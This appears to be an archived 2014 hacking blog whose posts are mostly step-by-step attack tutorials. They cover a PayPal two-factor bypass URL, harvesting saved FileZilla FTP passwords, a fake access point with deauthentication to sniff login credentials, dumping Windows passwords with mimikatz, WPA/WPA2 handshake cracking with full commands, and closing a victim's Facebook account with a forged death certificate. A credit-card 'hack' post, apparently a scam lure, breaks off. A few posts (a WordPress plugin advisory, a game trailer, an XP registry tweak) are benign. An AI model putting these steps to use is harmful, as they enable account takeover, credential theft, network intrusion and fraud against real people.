Wednesday, August 6, 2014 4:40 AM

Paypal Complete 2-Factor Authentication(2FA) Bypass Exploit.

To make it clear: The Paypal account you were 'hacking' did NOT have to be affiliated with the eBay account you were using. In my original tests, I had made a new eBay account using a temporary email, and had gotten into my Paypal through the same method.

 

 

 Found By Joshau Rojers

 It works even without an eBay account, actually.

https://www.paypal.com/cgi-bin/webscr?cmd=_integrated-registration&key=0&stamp=1364194631&data=JGHnP2g2ybqbgKfR7%2B1loOlg24LvI/VppQIqFE8DyTO9hqc1x1pQw42CCLy3EdEogm85LYOTKtU2wYNfjFZvuHSx4PjAHLVtlv6sYdPl2FIBLN7BNr3l%2BPe0WPeDhopUWqhw0PYE9EAyZPkgIZWJgWKGGGNPqdQRjlbNGoCCIox7RLfKmtEDeH8KXEOzZDSmvETO%2B7fkoy06CLe9CkJhE0V8Mh9QN/wNYIF6WMFgHsze7RAS8Qe3j/U9I9zYXDPcfB2L5AVCYI53jcWUOxeKXSlcoV0eIcxkLOkLfmSqnaY9vywEQEhEU2PYoKSqefaZBPFh6Y7kWXVD/7id8PvkrJzKaCUq0nhBRfFGtf1kYrK0ZgX%2Byws4HmiTn4GEL/gaUPtpWviP4BCJmeGOhzQEhbFNYwzuzmOWAaqYfsa62DsAcq3LUy1DyAmBfsLhwzRyzZhKlg1NRz5MxTsuBqlh72W6ytc1gEMwh%2BJtBxZTf7EggIaTRLdpjXMlZmwRjkMH2BjX8P4968XicykzmLhTpqpg507flV%2Belq3QNBd9cAliSskS3n/%2Bd1os7FQBnogr4tZ7srcTkoPM5nezXqz3caE/loqoJnkWvlRYfNJpSSysjQ%2BThTgiwNtk4eh8X2r3LhepLD27KdM7I299%2BnWVF9veVjw625ZT%2B3MyQMiO7FbMJdng5baW%2BZIRFIear2GlEJVXMlftP3ibMJAmzGrnKqB0sPwY3augnaBNnz4u32QAaxg8zhvz5FEaELdpFxJ4ptLdRc2MFUBFkUDm%2B5tlpuNl9JzgKTDQnXzYxX/2KYAznivHTlsCcwH68kL6EqoiGGTsFoLzp8TqnLvizULu6tdfnTAhhxV6kCeRRoyN/a62wahvxDibJgTnTjp4d3/xm4nhkQhQ5/xUgtAN9T1aa7n5PinOWS84AOFR0TB3KpwHsQkoQCGXvzdYZh4wD8ECQzYS9lbpaCLm13GqPGK4xC6K2vat8/gt9uoiJbiy77SK2PcMhcRS3KbK9Z0HtDCl&ev=1.0&locale=en_US
 
On the 5th of June, 2014, I found a complete bypass for Paypal's 2FA service, in which anybody would be able to access a Paypal account that has 2FA setup, by only logging in through a "special" Paypal page.

 eBay, in conjunction with Paypal, provide a service as to where you can link your eBay account to your Paypal account, and when you sell something on eBay, the fees automatically come out of your Paypal account.

When setting this up, you're (obviously) asked for your Paypal login.

When you are redirected to the login page(above), the URL contains "=_integrated-registration". Doing a quick Google search for this shows that it isn't used for anything other than eBay; thus it is setup purely for Paypal&eBay.

Once you're actually logged in, a cookie is set with your details, and you're redirected to a page to confirm the details of the process. And this is where the exploit lays. Now just load http://www.paypal.com/ , and you are logged in, and don't need to re-enter your login.

So, the actual bug itself is that the "=_integrated-registration" function does not check for a 2FA code, despite logging you into Paypal.

You could repeat the process using the same "=_integrated-registration" page unlimited times. 
When you are redirected to the login page(above), the URL contains "=_integrated-registration". Doing a quick Google search for this shows that it isn't used for anything other than eBay; thus it is setup purely for Paypal&eBay.

Once you're actually logged in, a cookie is set with your details, and you're redirected to a page to confirm the details of the process. And this is where the exploit lays. Now just load http://www.paypal.com/ , and you are logged in, and don't need to re-enter your login.

So, the actual bug itself is that the "=_integrated-registration" function does not check for a 2FA code, despite logging you into Paypal.

You could repeat the process using the same "=_integrated-registration" page unlimited times. 

 I originally found this on the 5th of June, 2014, and reported it to Paypal the same day.

I have also uploaded a demonstration of it on YouTube.


It still works.


For Complete Tutorial Contact me on Facebook or Twitter
https://www.facebook.com/zxera
https://www.twitter.com/Yedens

For Educational Porpose only

Monday, July 14, 2014 3:37 AM

How to Crack FTP password from FileZilla??

Wonder How to crack FTP password from FileZilla, when it is an application to connect to FTP server? Well guys this is not a hack. it is simply a Trick so that you can Grab bunch of passwords that were connected to FTP server from FIlezilla.

Beware, FileZilla doesn't protect your password. 
It simply save your password in xml data in your users Roaming directry.

In this tutorial we will go through how to extract saved password in Filezilla so without wasting time lets start step by step tutorial




 

 

 

Step 1:

Go to your desktop, Here im using desktop tab in favorite now go to Users (system folder).
  

 

Step 2:

Before going further lets we unhide(show hidden items) everything. So it will help us in future steps
for doing this
goto view on top of your explorer
and make sure you've checked on hidden items

Step 3:

Now you're ready to go further.. if you've done properly in above step 2 you should see AppData Directory. Now go to AppData and open Roaming directory


  

Step 4:

Now you should see FileZilla folder inside Roaming Directory
Open FileZilla.

Now You should see some xml files (filezilla.xml, filters.xml, queue.xml and other)
Right Click on recentservers.xml left click on "Edit with Notepad+" or simply "Edit" in drop menu

Step 5:

Now voila, You've successfully cracked FTP password :D

Conclusion

Never leave your history.. always clear your history after using FileZilla for protecting your password.. in 2009 many of the servers were hacked by FileZilla malwares. by default FIlezilla doesn't protect your password

hope you've enjoyed tutorials

Sunday, June 22, 2014 5:23 PM

A Beginners Guide to Ethical Hacking - E-BOOK

A Beginners Guide to Ethical Hacking is a complete path for newbie hackers who want are curious to Learn Ethical Hacking Techniques.The Information given in this book will make you a master hacker.

How will the information in the book affect me?

  • You will learn All Ethical hacking techniques and also you will learn to apply them in real world situation
  • You will start to think like hackers
  • Secure your computer from trojans,worms, Adwares etc
  • Amaze your friends with your newly learned tricks
  • You will be able to protect your self from future hack attacks
 Download it for free


Wifi Packet Capturing and Session Hijacking using Wireshark 2

Before you go to this section it is required you to read first tutorial
Wifi Packet Capturing and Session Hijacking using Wireshark 1

Step - 7 

Now Setting up New configurations by typing these commands. 
“ifconfig eth0 0.0.0.0 up”  
“ifconfig at0 0.0.0.0 up” 
   
Description -  
ifconfig stands for interface configurator. ifconfig command is used to configure network interfaces. ifconfig is widely used to initialize the network interface and to enable or disable the interfaces.  

Step -8

Now it’s turn on MITM Interface by typing this command 
“ifconfig mitm up”  

Description –  
ifconfig stands for interface configurator. ifconfig command is used to configure network interfaces. ifconfig is widely used to initialize the network interface and to enable or disable the interfaces. 
By Default Interface we created is down, we need to put it up.

Step – 9 

Now send the deauthentication packets to the router by typing this command
“aireplay-ng - - deauth 0 - a 94:44:52:DA:B4:28 mon0”   

Description –  
Aireplay-ng is used to inject frames.  
The primary function is to generate traffic for the later use in aircrack-ng for cracking the WEP and WPA-PSK keys. There are different attacks which can cause deauthentications for the purpose of capturing WPA handshake data, fake authentications, Interactive packet replay, hand- crafted ARP request injection and ARP-request reinjection. 
We use 0 for continuous Flooding of packets. We use 1 for Single Flooding of packet. 
-a represent bssid of the victim network. 94:44:52:DA:B4:28 here is a bssid of the victim network.

Step - 10

Now it’s time to assigning the IP to all victims by typing this command
“dhclient3 mitm&”   OR  “dhclient3 mitm &”  

Description –  
Dynamic Host Configuration Protocol (DHCP) is a network protocol that enables a server to automatically assign an IP address to a computer from a defined range of numbers (i.e., a scope) configured for a given network. 

Step – 11 

Now you can check the client connected on the 5th Terminal where you create Fake Access point.

Step – 12 

Start your Wireshark Packet Analyzer Tool by typing this command 
“wireshark&”   OR   “wireshark &  

Description –   
 Wireshark is an open source tool for profiling network traffic and analyzing packets. Such a tool is often referred to as a network analyzer, network protocol analyzer or sniffer.

Step – 13 

Now Select the Interface (at0) and click on START

Type “http contains POST” and you can see that all packets be in your sniffing tool


and you'll get user name and password :)
Happy hacking


Wifi Packet Capturing and Session Hijacking using Wireshark 1



The main Objective of this Attack is to make a Fake Access point and send the fake ARP Packets on same Wi-Fi Network from where the users are connected and the name of fake access point is same as the name of the wireless network reside there. So when a fake access point is created with same wireless network name then the user which is connected to original network gets disconnected and connects with your fake access point, so all the traffic tunnels throughout my system and we get all details/credentials/information of that user which is generally known as session hijacking.

 

Requirements

1. Backtrack Operating System (BT5)
2. Virtual Machine (With USB Adapter)
3. Internet Access on your System 

Step 1

Open Backtrack Operating System and start Terminal and type “iwconfig” for checking wireless interface.

Description – 
iwconfig is similar to ifconfig, but is dedicated to the wireless interfaces. It is used to set the parameters of the network interface which are specific to the wireless operation (for example: the frequency).

Step - 2

Start this Wireless Interface by typing this command 
“airmon-ng start wlan0”.
 
Description – 
This script can be used to enable monitor mode on wireless interfaces. It may also be used to go back from monitor mode to managed mode. Entering the airmon-ng command without parameters will show the interfaces status. 
wlan0 is your wifi card.  wlan is wireless lan and 0 is the number of your card.

Step - 3

Start your monitor mode by typing this command “airodump-ng mon0”. It captures data from all stations. 

Description -    
Airodump-ng is used for packet capturing of raw 802.11 frames and is particularly suitable for collecting WEP IVs (Initialization Vector) for the intent of using them with aircrack-ng. Also airodump-ng is capable of logging the coordinates of the found access points. 
mon0 is the same card (wlan0) in monitor mode.  Once you put wlan0 in monitor mode it will be read as mon0 and wlan0

Step - 4

Set up the channel ID which is shown above in airodump-ng command by typing these commands   “iwconfig mon0 channel 5”      “iwconfig wlan0 channel 5
                                               OR 
iwconfig wlan0 channel 5”     “iwconfig mon0 channel 5”  

Decription -  
iwconfig is similar to ifconfig, but is dedicated to the wireless interfaces. It is used to set the parameters of the network interface which are specific to the wireless operation (for example: the frequency).
wlan0 is your wifi card.  wlan is wireless lan and 0 is the number of your card. 
mon0 is the same card (wlan0) in monitor mode.  Once you put wlan0 in monitor mode it will be read as mon0 and wlan0. 
The ”–channel” (-c) option allows a single or specific channels to be selected.

Step -5

Now Setup your Fake Router by typing this command 
“airbase-ng - e “belkin.3448” mon0” 
Description – 
Airbase-ng is multi-purpose tool aimed at attacking clients as opposed to the Access Point (AP) itself. The main idea is of the implementation is that it should encourage clients to associate with the fake AP, not prevent them from accessing the real AP.
”– essid” (-e) of the Network.

Step - 6 

Now it’s time to bridge all networks by typing these commands   
“brctl addbr mitm”  
“brctl addif mitm eth0” 
 “brctl addif mitm at0”
Here – mitm is <interface name>
Description - 
Brctl - is used to create a bridge between two interfaces. 
Addbr - A bridge can be added using the following command, with <name> being replaced with the name of the bridge being replaced. 
Addif - To add a interface to a bridge, Where <brname> is the existing bridge name, and ifname is the interface you want to add.

Wednesday, June 11, 2014 7:39 AM

Far Cry 4 World Gameplay (Nepal) Premiere- Walkthrough E3 2014











Watch the first Far Cry 4 game play footage, introducing the #1 most requested feature among fans: open-world co-op with a friend!


Included Environment Concept of Nepal and Bhutan

About Far Cry 4
Far Cry 4 delivers a massive new open world for you to explore and survive. Hidden in the towering Himalayas lies Kyrat, a country steeped in tradition and violence. You are Ajay Ghale. Traveling to Kyrat to fulfill your mother's dying wish, you find yourself caught up in a civil war to overthrow the oppressive regime of dictator Pagan Min. Explore and navigate this vast open world, where danger and unpredictability lurk around every corner. Here, every decision counts, and every second is a story

Tuesday, June 10, 2014 12:11 AM

Hack Windows password in notime

So you were looking for Windows 8 password hacking tool. Never found any interesting post; right?

Now here I'm back with 100% working Windows 8 password hacking tutorial

So what are you looking at start downloading tool and proceed step by step

Step 1

Download Tool [click here]
Now Extract downloaded tools where ever you want

Step 2

Open appropriate folder x64 or win32 suitable for your Operating System

Step 3

Run mimikatz as a Administrator
on Firewall notification select "Yes"

Step 4

Now this screen will be displayed


 

Step 5

To Check privilege is given or not enter the code below:-
privilege::debug
You should get result like below image

Step 6

If you get privilege as image above now you are ready to get password
now Enter the command below to get the password
 sekurlsa::logonPasswords full
there is space after passwords 
   
 Hope you've enjoyed this tutorial :) please comment your feedback

Friday, June 6, 2014 4:24 AM

Close Facebook Accounts

What this guide will show you, is how to get any facebook account closed. You will do this by tricking facebook into thinking the person is dead, so they will close the account.

This simple tutorial will help you to close your friends, family or anyone's facebook account if he/she is no more in this world. All the best (y)
 
 
 
 
 
 
  1. Goto
  1. Full Name: Your Victims Full name(Name last name)
    Date of birth: Go at his profile and click at Info tab and get his date of birth.
    Account Email Addresses: Do the same thing, go to his profile and click on info tab and get his email addresses.
    Networks: Again,go to his profile and click on Info tab and get his networks, copy them and paste in the form.
    Web address of profile you would like to report: Just go to his profile and copy the link in the address bar.
    Relationship to this person: To make more believable select Immediate Family.
    Requested Action: Remove Profile
    Proof Of Death: This is the hardest part of this form. Now to make a proof of a death just Google in your language a Death Certificate or Certificate of a Death. Open up the image in photoshop and fill in the blanks. Save your image to desktop and upload it in one of the Image
    Free Hosting like: http://imageshack.us
    Additional Information: Write what you want, just write that you are in his/her family and you would like to close his/her Facebook account because you won't like that when he is dead, his Facebook is opened.
  2. Click on Submit and then a message will appear:
    Your injury was submitted at Facebook Team .. So the meaning is that one of the mod's of Facebook will review your report and will do the right decision. It works in most of the time.
 

Sunday, June 1, 2014 7:48 AM

Vulnerabilities in 'All in One SEO Pack' Wordpress Plugin Put Millions of Sites At Risk

Multiple Serious vulnerabilities have been discovered in the most famous ‘All In One SEO Pack’ plugin for WordPress, that put millions of Wordpress websites at risk.

WordPress is easy to setup and use, that’s why large number of people like it. But if you or your company is using ‘All in One SEO Pack’ Wordpress plugin to optimize the website ranking in search engines, then you should update your SEO plugin immediately to the latest version of All in One SEO Pack 2.1.6.

Today, All in One SEO Pack plugin team has released an emergency security update that patches two critical privilege escalation vulnerabilities and one cross site scripting (XSS) flaw, discovered by security researchers at Sucuri, a web monitoring and malware clean up service.

More than 73 million websites on the Internet run their websites on the WordPress publishing platform and more than 15 million websites are currently using All in One SEO Pack plugin for search engine optimization.

According to Sucuri, the reported privilege escalation vulnerabilities allow an attacker to add and modify the WordPress website’s meta information, that could harm its search engine ranking negatively.

"In the first case, a logged-in user, without possessing any kind of administrative privileges (like an author of subscriber), could add or modify certain parameters used by the plugin. It includes the post’s SEO title, description and keyword meta tags." Sucuri said.
 Also the reported cross-site scripting vulnerability can be exploited by malicious hackers to execute malicious JavaScript code on an administrator’s control panel. "This means that an attacker could potentially inject any JavaScript code and do things like changing the admin’s account password to leaving some backdoor in your website’s files in order to conduct even more “evil” activities later." Sucuri blog post said.

Vulnerability in WordPress plugins is the root cause for the majority of WordPress exploitation and this is one of the main tools in the web hackers' arsenal. The plugin vulnerabilities could be exploited to access sensitive information, deface websites, redirect visitors to any malicious site, or to perform DDoS attacks.

Till now, we haven't seen any web attacks conducted by exploiting these vulnerabilities in the wild, but WordPress website owners are recommended to update their All in One SEO Pack Wordpress plugin to the latest version immediately.

Thursday, May 29, 2014 12:58 AM

Tutorial 3: How to Crack WPA/WPA2


Step 2 - Start airodump-ng to collect authentication handshake

The purpose of this step is to run airodump-ng to capture the 4-way authentication handshake for the AP we are interested in.

Enter:



airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w psk ath0

Where:
-c 9 is the channel for the wireless network
--bssid 00:14:6C:7E:40:80 is the access point MAC address. This eliminates extraneous traffic.
-w psk is the file name prefix for the file which will contain the IVs.
ath0 is the interface name.

Important: Do NOT use the "--ivs" option. You must capture the full packets.

Here what it looks like if a wireless client is connected to the network:



CH 9 ][ Elapsed: 4 s ][ 2007-03-24 16:58 ][ WPA handshake: 00:14:6C:7E:40:80



BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID



00:14:6C:7E:40:80 39 100 51 116 14 9 54 WPA2 CCMP PSK teddy



BSSID STATION PWR Lost Packets Probes



00:14:6C:7E:40:80 00:0F:B5:FD:FB:C2 35 0 116

In the screen above, notice the "WPA handshake: 00:14:6C:7E:40:80" in the top right-hand corner. This means airodump-ng has successfully captured the four-way handshake.

Here it is with no connected wireless clients:



CH 9 ][ Elapsed: 4 s ][ 2007-03-24 17:51



BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID



00:14:6C:7E:40:80 39 100 51 0 0 9 54 WPA2 CCMP PSK teddy



BSSID STATION PWR Lost Packets Probes

Troubleshooting Tip
See the Troubleshooting Tips section below for ideas.

To see if you captured any handshake packets, there are two ways. Watch the airodump-ng screen for " WPA handshake: 00:14:6C:7E:40:80" in the top right-hand corner. This means a four-way handshake was successfully captured. See just above for an example screenshot.

Use Wireshark and apply a filter of "eapol". This displays only eapol packets you are interested in. Thus you can see if capture contains 0,1,2,3 or 4 eapol packets.



Step 3 - Use aireplay-ng to deauthenticate the wireless client

This step is optional. If you are patient, you can wait until airodump-ng captures a handshake when one or more clients connect to the AP. You only perform this step if you opted to actively speed up the process. The other constraint is that there must be a wireless client currently associated with the AP. If there is no wireless client currently associated with the AP, then you have to be patient and wait for one to connect to the AP so that a handshake can be captured. Needless to say, if a wireless client shows up later and airodump-ng did not capture the handshake, you can backtrack and perform this step.

This step sends a message to the wireless client saying that that it is no longer associated with the AP. The wireless client will then hopefully reauthenticate with the AP. The reauthentication is what generates the 4-way authentication handshake we are interested in collecting. This is what we use to break the WPA/WPA2 pre-shared key.

Based on the output of airodump-ng in the previous step, you determine a client which is currently connected. You need the MAC address for the following. Open another console session and enter:



aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 ath0

Where:
-0 means deauthentication
1 is the number of deauths to send (you can send multiple if you wish)
-a 00:14:6C:7E:40:80 is the MAC address of the access point
-c 00:0F:B5:FD:FB:C2 is the MAC address of the client you are deauthing
ath0 is the interface name

Here is what the output looks like:



11:09:28 Sending DeAuth to station -- STMAC: [00:0F:B5:34:30:30]

With luck this causes the client to reauthenticate and yield the 4-way handshake.


Troubleshooting Tips

The deauthentication packets are sent directly from your PC to the clients. So you must be physically close enough to the clients for your wireless card transmissions to reach them. To confirm the client received the deauthentication packets, use tcpdump or similar to look for ACK packets back from the client. If you did not get an ACK packet back, then the client did not "hear" the deauthentication packet.


Step 4 - Run aircrack-ng to crack the pre-shared key

The purpose of this step is to actually crack the WPA/WPA2 pre-shared key. To do this, you need a dictionary of words as input. Basically, aircrack-ng takes each word and tests to see if this is in fact the pre-shared key.

There is a small dictionary that comes with aircrack-ng - "password.lst". This file can be found in the "test" directory of the aircrack-ng source code. The Wiki FAQ has an extensive list of dictionary sources. You can use John the Ripper (JTR) to generate your own list and pipe them into aircrack-ng. Using JTR in conjunction with aircrack-ng is beyond the scope of this tutorial.

Open another console session and enter:



aircrack-ng -w password.lst -b 00:14:6C:7E:40:80 psk*.cap

Where:
-w password.lst is the name of the dictionary file. Remember to specify the full path if the file is not located in the same directory.
*.cap is name of group of files containing the captured packets. Notice in this case that we used the wildcard * to include multiple files.

Here is typical output when there are no handshakes found:



Opening psk-01.cap

Opening psk-02.cap

Opening psk-03.cap

Opening psk-04.cap

Read 1827 packets.

No valid WPA handshakes found.

When this happens you either have to redo step 3 (deauthenticating the wireless client) or wait longer if you are using the passive approach. When using the passive approach, you have to wait until a wireless client authenticates to the AP.

Here is typical output when handshakes are found:



Opening psk-01.cap

Opening psk-02.cap

Opening psk-03.cap

Opening psk-04.cap

Read 1827 packets.



# BSSID ESSID Encryption

1 00:14:6C:7E:40:80 teddy WPA (1 handshake)



Choosing first network as target.

Now at this point, aircrack-ng will start attempting to crack the pre-shared key. Depending on the speed of your CPU and the size of the dictionary, this could take a long time, even days.

Here is what successfully cracking the pre-shared key looks like:



Aircrack-ng 0.8





[00:00:00] 2 keys tested (37.20 k/s)





KEY FOUND! [ 12345678 ]





Master Key : CD 69 0D 11 8E AC AA C5 C5 EC BB 59 85 7D 49 3E

B8 A6 13 C5 4A 72 82 38 ED C3 7E 2C 59 5E AB FD



Transcient Key : 06 F8 BB F3 B1 55 AE EE 1F 66 AE 51 1F F8 12 98

CE 8A 9D A0 FC ED A6 DE 70 84 BA 90 83 7E CD 40

FF 1D 41 E1 65 17 93 0E 64 32 BF 25 50 D5 4A 5E

2B 20 90 8C EA 32 15 A6 26 62 93 27 66 66 E0 71



EAPOL HMAC : 4E 27 D9 5B 00 91 53 57 88 9C 66 C8 B1 29 D1 CB




Tutorial 1: How to Crack WPA/WPA2

This tutorial walks you through cracking WPA/WPA2 networks which use pre-shared keys. I recommend you do some background reading to better understand what WPA/WPA2 is. The Wiki links page has a WPA/WPA2 section. The best document describing WPA is Wi-Fi Security - WEP, WPA and WPA2. This is the link to download the PDF directly. The WPA Packet Capture Explained tutorial is a companion to this tutorial.

WPA/WPA2 supports many types of authentication beyond pre-shared keys. aircrack-ng can ONLY crack pre-shared keys. So make sure airodump-ng shows the network as having the authentication type of PSK, otherwise, don't bother trying to crack it.

There is another important difference between cracking WPA/WPA2 and WEP. This is the approach used to crack the WPA/WPA2 pre-shared key. Unlike WEP, where statistical methods can be used to speed up the cracking process, only plain brute force techniques can be used against WPA/WPA2. That is, because the key is not static, so collecting IVs like when cracking WEP encryption, does not speed up the attack. The only thing that does give the information to start an attack is the handshake between client and AP. Handshaking is done when the client connects to the network. Although not absolutely true, for the purposes of this tutorial, consider it true. Since the pre-shared key can be from 8 to 63 characters in length, it effectively becomes impossible to crack the pre-shared key.

The only time you can crack the pre-shared key is if it is a dictionary word or relatively short in length. Conversely, if you want to have an unbreakable wireless network at home, use WPA/WPA2 and a 63 character password composed of random characters including special symbols.

The impact of having to use a brute force approach is substantial. Because it is very compute intensive, a computer can only test 50 to 300 possible keys per second depending on the computer CPU. It can take hours, if not days, to crunch through a large dictionary. If you are thinking about generating your own password list to cover all the permutations and combinations of characters and special symbols, check out this brute force time calculator first. You will be very surprised at how much time is required.

IMPORTANT
This means that the passphrase must be contained in the dictionary you are using to break WPA/WPA2. If it is not in the dictionary then aircrack-ng will be unable to determine the key.

There is no difference between cracking WPA or WPA2 networks. The authentication methodology is basically the same between them. So the techniques you use are identical.

It is recommended that you experiment with your home wireless access point to get familiar with these ideas and techniques. If you do not own a particular access point, please remember to get permission from the owner prior to playing with it.

I would like to acknowledge and thank the Aircrack-ng team for producing such a great robust tool.

Please send me any constructive feedback, positive or negative. Additional troubleshooting ideas and tips are especially welcome.

Assumptions
First, this solution assumes:
  • You are using drivers patched for injection. Use the injection test to confirm your card can inject.
  • You are physically close enough to send and receive access point and wireless client packets. Remember that just because you can receive packets from them does not mean you may will be able to transmit packets to them. The wireless card strength is typically less then the AP strength. So you have to be physically close enough for your transmitted packets to reach and be received by both the AP and the wireless client. You can confirm that you can communicate with the specific AP by following these instructions.
  • You are using v0.9.1 or above of aircrack-ng. If you use a different version then some of the command options may have to be changed.

Ensure all of the above assumptions are true, otherwise the advice that follows will not work. In the examples below, you will need to change "ath0" to the interface name which is specific to your wireless card.
Equipment used
In this tutorial, here is what was used:
  • MAC address of PC running aircrack-ng suite: 00:0F:B5:88:AC:82
  • MAC address of the wireless client using WPA2: 00:0F:B5:FD:FB:C2
  • BSSID (MAC address of access point): 00:14:6C:7E:40:80
  • ESSID (Wireless network name): teddy
  • Access point channel: 9
  • Wireless interface: ath0

You should gather the equivalent information for the network you will be working on. Then just change the values in the examples below to the specific network.

Solution
Solution Overview
The objective is to capture the WPA/WPA2 authentication handshake and then use aircrack-ng to crack the pre-shared key.

This can be done either actively or passively. "Actively" means you will accelerate the process by deauthenticating an existing wireless client. "Passively" means you simply wait for a wireless client to authenticate to the WPA/WPA2 network. The advantage of passive is that you don't actually need injection capability and thus the Windows version of aircrack-ng can be used.

Here are the basic steps we will be going through:
  • Start the wireless interface in monitor mode on the specific AP channel
  • Start airodump-ng on AP channel with filter for bssid to collect authentication handshake
  • Use aireplay-ng to deauthenticate the wireless client Run aircrack-ng to crack the pre-shared
  • key using the authentication handshake

Tutorial 2: How to Crack WPA/WPA2

Tutorial 1: How to Crack WPA/WPA2




Step 1 - Start the wireless interface in monitor mode
 
The purpose of this step is to put your card into what is called monitor mode. Monitor mode is the mode whereby your card can listen to every packet in the air. Normally your card will only "hear" packets addressed to you. By hearing every packet, we can later capture the WPA/WPA2 4-way handshake. As well, it will allow us to optionally deauthenticate a wireless client in a later step.

The exact procedure for enabling monitor mode varies depending on the driver you are using. To determine the driver (and the correct procedure to follow), run the following command:



airmon-ng
 
On a machine with a Ralink, an Atheros and a Broadcom wireless card installed, the system responds:



Interface Chipset Driver



rausb0 Ralink RT73 rt73

wlan0 Broadcom b43 - [phy0]

wifi0 Atheros madwifi-ng

ath0 Atheros madwifi-ng VAP (parent: wifi0)
 
The presence of a [phy0] tag at the end of the driver name is an indicator for mac80211, so the Broadcom card is using a mac80211 driver. Note that mac80211 is supported only since aircrack-ng v1.0-rc1, and it won't work with v0.9.1. Both entries of the Atheros card show "madwifi-ng" as the driver - follow the madwifi-ng-specific steps to set up the Atheros card. Finally, the Ralink shows neither of these indicators, so it is using an ieee80211 driver - see the generic instructions for setting it up.


Step 1a - Setting up madwifi-ng
First stop ath0 by entering:



airmon-ng stop ath0
 
The system responds:



Interface Chipset Driver



wifi0 Atheros madwifi-ng

ath0 Atheros madwifi-ng VAP (parent: wifi0) (VAP destroyed)
 
Enter "iwconfig" to ensure there are no other athX interfaces. It should look similar to this:



lo no wireless extensions.



eth0 no wireless extensions.



wifi0 no wireless extensions.
 
If there are any remaining athX interfaces, then stop each one. When you are finished, run "iwconfig" to ensure there are none left.

Now, enter the following command to start the wireless card on channel 9 in monitor mode:



airmon-ng start wifi0 9
 
Note: In this command we use "wifi0" instead of our wireless interface of "ath0". This is because the madwifi-ng drivers are being used.

The system will respond:



Interface Chipset Driver



wifi0 Atheros madwifi-ng

ath0 Atheros madwifi-ng VAP (parent: wifi0) (monitor mode enabled)
 
You will notice that "ath0" is reported above as being put into monitor mode.

To confirm the interface is properly setup, enter "iwconfig".

The system will respond:



lo no wireless extensions.



wifi0 no wireless extensions.



eth0 no wireless extensions.



ath0 IEEE 802.11g ESSID:"" Nickname:""

Mode:Monitor Frequency:2.452 GHz Access Point: 00:0F:B5:88:AC:82

Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3

Retry:off RTS thr:off Fragment thr:off

Encryption key:off

Power Management:off

Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm

Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0

Tx excessive retries:0 Invalid misc:0 Missed beacon:0
 
In the response above, you can see that ath0 is in monitor mode, on the 2.452GHz frequency which is channel 9 and the Access Point shows the MAC address of your wireless card. Only the madwifi-ng drivers show the card MAC address in the AP field, other drivers do not. So everything is good. It is important to confirm all this information prior to proceeding, otherwise the following steps will not work properly.

Step 1b - Setting up mac80211 drivers
Unlike madwifi-ng, you do not need to remove the wlan0 interface when setting up mac80211 drivers. Instead, use the following command to set up your card in monitor mode on channel 9:



airmon-ng start wlan0 9
 
The system responds:



Interface Chipset Driver



wlan0 Broadcom b43 - [phy0]

(monitor mode enabled on mon0)
 
Notice that airmon-ng enabled monitor-mode on mon0. So, the correct interface name to use in later parts of the tutorial is mon0. Wlan0 is still in regular (managed) mode, and can be used as usual, provided that the AP that wlan0 is connected to is on the same channel as the AP you are attacking, and you are not performing any channel-hopping.

To confirm successful setup, run "iwconfig". The following output should appear:



lo no wireless extensions.

eth0 no wireless extensions.



wmaster0 no wireless extensions.



wlan0 IEEE 802.11bg ESSID:""

Mode:Managed Frequency:2.452 GHz Access Point: Not-Associated

Tx-Power=0 dBm

Retry min limit:7 RTS thr:off Fragment thr=2352 B

Encryption key:off

Power Management:off

Link Quality:0 Signal level:0 Noise level:0

Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0

Tx excessive retries:0 Invalid misc:0 Missed beacon:0



mon0 IEEE 802.11bg Mode:Monitor Frequency:2.452 GHz Tx-Power=0 dBm

Retry min limit:7 RTS thr:off Fragment thr=2352 B

Encryption key:off

Power Management:off

Link Quality:0 Signal level:0 Noise level:0

Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0

Tx excessive retries:0 Invalid misc:0 Missed beacon:0
 
Here, mon0 is seen as being in monitor mode, on channel 9 (2.452GHz). Unlike madwifi-ng, the monitor interface has no Access Point field at all. Also notice that wlan0 is still present, and in managed mode - this is normal. Because both interfaces share a common radio, they must always be tuned to the same channel - changing the channel on one interface also changes channel on the other one.


Step 1c - Setting up other drivers
For other (ieee80211-based) drivers, simply run the following command to enable monitor mode (replace rausb0 with your interface name):



airmon-ng start rausb0 9
 
The system responds:



Interface Chipset Driver



rausb0 Ralink rt73 (monitor mode enabled)
 
At this point, the interface should be ready to use.

 

Wednesday, May 28, 2014 3:31 AM

Registry Hack: Get Windows XP Security Updates until 2019

         Microsoft ended its support for Windows XP officially more than a month ago on April 8, 2014. This made a large number of users to switch to the latest version of Windows, but still a wide portion of users are using Microsoft oldest and most widely used operating system, despite not receiving security updates.
 
       Now a relatively simple method has emerged as a trick for the XP users which makes it possible to receive Windows XP security updates for the next five years i.e. until April 2019.
 
        You are not allowed to directly install these Windows updates for your OS. In order to download new security updates for your Windows XP, you just need to perform a simple intervention into the Windows registration database.
 
 
STEPS TO FOLLOW:

•Open Notepad and create a new file.
•Add Below given code to it:
“ Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\WPA\PosReady]
"Installed"=dword:00000001
•Save file as .reg extension and run it by double clicks.
•Once executed, you will find lots of pending updates in your Windows Action Center.
 
 
Because the extended support for Windows Embedded POSReady 2009 systems ends after 5 years, Microsoft will continue to deliver new security updates and patches for this version of its embedded operating system till April 9th, 2019, so users can use this trick to get security updates of Windows XP for another five years.
 
Important Note for our Readers - Despite receiving security updates for Windows XP by using such tricks, it is not possible to secure the complete system appropriately. So we highly recommend all of you to upgrade your operating system to the latest versions, i.e. Windows 7 or 8 or any Linux Distro.
 
 

Tuesday, May 27, 2014 3:37 PM

Hack Valid Credit Card Numbers With CCV Numbers


Before going shopping online, every customer has to register online with his/her credit card information and they'll leave their emails too so that those shopping websites will confirm their registration. For those online shoppers who used yahoo emails, their credit card info is automatically stored in the yahoo server when the companies send to them confirmation emails. However, there is a BIG bug in the server that those people's credit card information can be retrieved by any random email user who has a VALID credit card. To simplify this, here is how it works:
 
